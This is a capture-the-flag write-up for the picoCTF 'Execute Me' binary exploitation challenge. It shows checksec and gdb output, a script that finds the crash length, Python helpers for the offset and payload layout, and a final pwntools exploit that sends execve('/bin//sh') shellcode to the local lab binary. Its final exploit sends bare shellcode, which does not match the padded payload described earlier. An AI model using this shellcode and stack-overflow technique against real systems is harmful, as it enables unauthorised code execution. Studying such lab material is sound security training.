[Pico CTF] Execute Me (80 Points)
Problem
We are given the file execute and its source code execute.c. Exploit the binary and find the secret information!
Solution
Information Gathering
Start by checking the file type and which protections the binary was built with.
$ file execute
execute: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=db3a216083ae03f55fc8640ce1145135b365356f, not stripped
$ checksec execute
[*] '/.../execute'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
This binary has essentially no protection: no stack canary, NX disabled (the stack is executable, hence the RWX segment) and no PIE, so every address is fixed across runs. Partial RELRO is the only mitigation present, and it does not hinder a stack-based attack.
Identifying the Weakness
Find the input length that first produces a Segmentation Fault, using the script find_segfault_by_input.sh.
#!/bin/bash
# Grow the input one byte at a time and stop at the first length whose run
# ends in SIGSEGV (bash reports the exit status as 128 + 11 = 139).
# Note: echo appends a newline, so the file holds $i + 1 bytes.
buffer=""
for i in {1..2048}
do
    echo "$i"
    buffer+="A"
    echo "$buffer" > /tmp/delete.me
    "./$1" < /tmp/delete.me
    if [ $? -eq 139 ]; then
        echo "SEGMENTATION FAULT on $i BUFFER"
        break
    fi
done
~ skipped ~
71
72
Segmentation fault (core dumped) ./$1 < /tmp/delete.me
SEGMENTATION FAULT on 72 BUFFER
To find the number of bytes needed to actually control EIP, run the binary under gdb with the command below (the binary was run under the name rop1 in this session, which is why the stack dump shows rop/rop1).
$ gdb -q rop1
gdb$ r `perl -e 'print "A"x72'`
Output:
EIP: 0xf7df9599 --> 0x90000018
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xf7df9599: sbb BYTE PTR [eax],al
0xf7df959b: add BYTE PTR [eax+0x4200074f],dl
0xf7df95a1: add BYTE PTR [eax],al
0xf7df95a3: add BYTE PTR [edx],bl
[------------------------------------stack-------------------------------------]
0000| 0xffffd308 --> 0x0
0004| 0xffffd30c --> 0x1
0008| 0xffffd310 --> 0xf7fe780b (<_dl_fixup+11>: add esi,0x157f5)
0012| 0xffffd314 --> 0x0
0016| 0xffffd318 --> 0xf7fa7000 --> 0x1b1db0
0020| 0xffffd31c --> 0xf7fa7000 --> 0x1b1db0
0024| 0xffffd320 --> 0xffffd398 --> 0xffffd300 --> 0x1
0028| 0xffffd324 --> 0xf7fee030 (<_dl_runtime_resolve+16>: pop edx)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xf7df9599 in ?? () from /lib/i386-linux-gnu/libc.so.6
Still not enough: EIP ended up inside libc rather than on our input bytes. Add 8 more bytes to make it 80 bytes.
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414141
[------------------------------------stack-------------------------------------]
0000| 0xffffd3a0 --> 0xffffd600 ("rop/rop1")
0004| 0xffffd3a4 --> 0x804820c --> 0x33 ('3')
0008| 0xffffd3a8 --> 0x80484fb (<__libc_csu_init+11>: add ebx,0x1b05)
0012| 0xffffd3ac --> 0x0
0016| 0xffffd3b0 --> 0xf7fa7000 --> 0x1b1db0
0020| 0xffffd3b4 --> 0xf7fa7000 --> 0x1b1db0
0024| 0xffffd3b8 --> 0x0
0028| 0xffffd3bc --> 0xf7e0d637 (<__libc_start_main+247>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414141 in ?? ()
Now the last 4 bytes of the input fill EIP, so the saved return address sits 76 bytes into the buffer (EAX shows the buffer starting at 0xffffd350; after the ret, ESP is 0xffffd3a0).
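A faster way to get the same offset is a cyclic pattern: every 4-byte window of the input is unique, so the value that lands in EIP identifies its own position. The block below is an added example, not code from the writeup: it implements the de Bruijn construction that pwntools' cyclic()/cyclic_find() use in plain Python, and stands in for the real crash with a constructed frame layout (return address at offset 76, as measured above) instead of running the binary.

```python
# Added example (not from the writeup): locate the return-address offset
# with a cyclic (de Bruijn) pattern instead of stepping "A" * N by hand.
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"


def de_bruijn(alphabet=ALPHABET, n=4):
    """Yield a de Bruijn sequence B(k, n): every n-byte window is unique."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length, n=4):
    """First `length` bytes of the pattern ("aaaabaaacaaad..." for n=4)."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(pattern, value, n=4):
    """Offset in `pattern` of the n bytes that landed in a 32-bit register
    (little-endian), or -1 if they are not part of the pattern."""
    return pattern.find(struct.pack("<I", value)[:n])


def simulated_eip(payload, ret_offset):
    """Constructed stand-in for the crash (the binary is not run here):
    with the saved return address `ret_offset` bytes into the buffer, as
    measured in gdb above, these 4 bytes are what EIP would become."""
    return struct.unpack("<I", payload[ret_offset:ret_offset + 4])[0]


if __name__ == "__main__":
    pattern = cyclic(100)
    eip = simulated_eip(pattern, 76)        # what gdb would report as EIP
    print("EIP: 0x%08x -> offset %d" % (eip, cyclic_find(pattern, eip)))
    # With "A" * 80 the crash value 0x41414141 is ambiguous: it matches
    # offset 0, not 76, which is why the all-"A" approach needed two tries.
    print("offset for 'A'*80:", cyclic_find(b"A" * 80, 0x41414141))
```

In a real session, feed `cyclic(100)` to the binary under gdb instead of "A"*N and pass the EIP value gdb prints to cyclic_find(); one crash gives the offset directly.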
Gadget
The right gadget depends on the register state at the moment of the crash, for example:
EAX: 0xffffd350 ('A' <repeats 80 times>)
EBX: 0x0
ECX: 0xffffd650 ("AAAAAAAAA")
EDX: 0xffffd397 ("AAAAAAAAA")
ESI: 0xf7fa7000 --> 0x1b1db0
EDI: 0xf7fa7000 --> 0x1b1db0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd3a0 --> 0xffffd600 ("rop/rop1")
EIP: 0x41414141 ('AAAA')
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
Because EAX still holds a pointer to the start of our input (0xffffd350, 'A' repeated 80 times) when the function returns, the gadget below transfers execution straight into the buffer.
call eax
In other words, instead of 'A's the buffer can carry the shellcode, NOP padding and the gadget address: the return address is overwritten with the gadget, the gadget calls EAX, and EAX points at the shellcode. Since EAX points at the first byte of the buffer, the shellcode goes first and the NOPs only pad it out to the return address at offset 76.
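Laid out concretely, as an added example that is not part of the writeup's exploit: shellcode at the start of the buffer (where EAX points), NOP padding up to the saved return address at offset 76, and the gadget address in the last 4 bytes. The page does not give the address of the `call eax` gadget, so the value used in the main block is a hypothetical placeholder; the shellcode bytes are the ones from the final exploit below.

```python
# Added example (not from the writeup): build the 80-byte payload described
# above: shellcode | NOP padding | address of a `call eax` gadget.
import struct

# 21-byte execve("/bin//sh", NULL, NULL) shellcode used by the writeup:
#   31 c9         xor ecx, ecx
#   f7 e1         mul ecx          ; eax = edx = 0 (argv/envp = NULL)
#   51            push ecx         ; NUL terminator for the path
#   68 2f2f7368   push "//sh"
#   68 2f62696e   push "/bin"
#   89 e3         mov ebx, esp     ; ebx -> "/bin//sh"
#   b0 0b         mov al, 0x0b     ; SYS_execve
#   cd 80         int 0x80
SHELLCODE = (b"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
             b"\x89\xe3\xb0\x0b\xcd\x80")

# Saved return address offset measured in gdb: 80 bytes put the last
# 4 bytes into EIP, so the return address starts at byte 76.
RET_OFFSET = 76
NOP = b"\x90"


def build_payload(gadget_addr, shellcode=SHELLCODE, ret_offset=RET_OFFSET):
    """Return shellcode + NOP padding + little-endian gadget address.

    The shellcode must sit at offset 0 because EAX points at the start of
    the buffer; the NOPs are filler, not a landing zone."""
    if len(shellcode) > ret_offset:
        raise ValueError("shellcode (%d bytes) does not fit before the "
                         "return address at offset %d"
                         % (len(shellcode), ret_offset))
    padding = NOP * (ret_offset - len(shellcode))
    return shellcode + padding + struct.pack("<I", gadget_addr)


def bad_bytes(payload, bad=b"\x00\x0a"):
    """Bytes that would cut the input short if the binary reads it with a
    line-oriented or C-string function; returns the set of offenders."""
    return {b for b in bad if b in payload}


if __name__ == "__main__":
    # HYPOTHETICAL placeholder: the writeup does not give the gadget address.
    # Find the real one with e.g. `ROPgadget --binary execute | grep "call eax"`
    # (no PIE, so it does not change between runs).
    CALL_EAX_GADGET = 0x08048abc
    payload = build_payload(CALL_EAX_GADGET)
    print("payload (%d bytes): %s" % (len(payload), payload.hex()))
    print("bad bytes:", bad_bytes(payload) or "none")
```

The check for 0x00 and 0x0a matters for the gadget address as much as for the shellcode: an address such as 0x08048000 packs to 00 80 04 08 and would be truncated by a NUL-terminating read.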
Final Exploit
from pwn import *

# 21-byte execve("/bin//sh", NULL, NULL) shellcode for 32-bit Linux
# (bytes literal so it also works with Python 3 pwntools)
shellcode = b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'

binary = process('./execute')
# Only the bare shellcode is sent on stdin: no padding and no gadget address.
binary.send(shellcode)
# Hand the terminal over to the shell once the shellcode runs.
binary.interactive()